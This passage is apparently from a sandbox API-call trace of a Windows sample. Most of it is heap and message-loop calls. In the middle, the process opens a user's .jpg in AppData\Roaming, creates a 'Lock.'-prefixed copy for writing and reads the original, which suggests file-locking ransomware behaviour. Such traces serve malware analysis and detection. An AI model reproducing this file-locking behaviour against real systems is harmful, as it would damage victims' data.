hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0196.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/dunBms1jB_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dunbms1jb_.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0196.767] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.767] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0196.767] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.767] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.767] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0196.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0196.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.dunBms1jB_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.dunbms1jb_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0196.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0196.768] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0196.768] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.768] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.768] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0196.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.769] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0196.769] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x7315, lpOverlapped=0x0) returned 1 [0196.769] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0196.770] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7315) returned 0x34a2048 [0196.770] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.771] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.771] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0196.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0196.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7315) returned 0x34a2048 [0196.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0196.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1728 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7315) returned 0x24ded78 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0196.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0196.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.774] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.776] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.776] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) 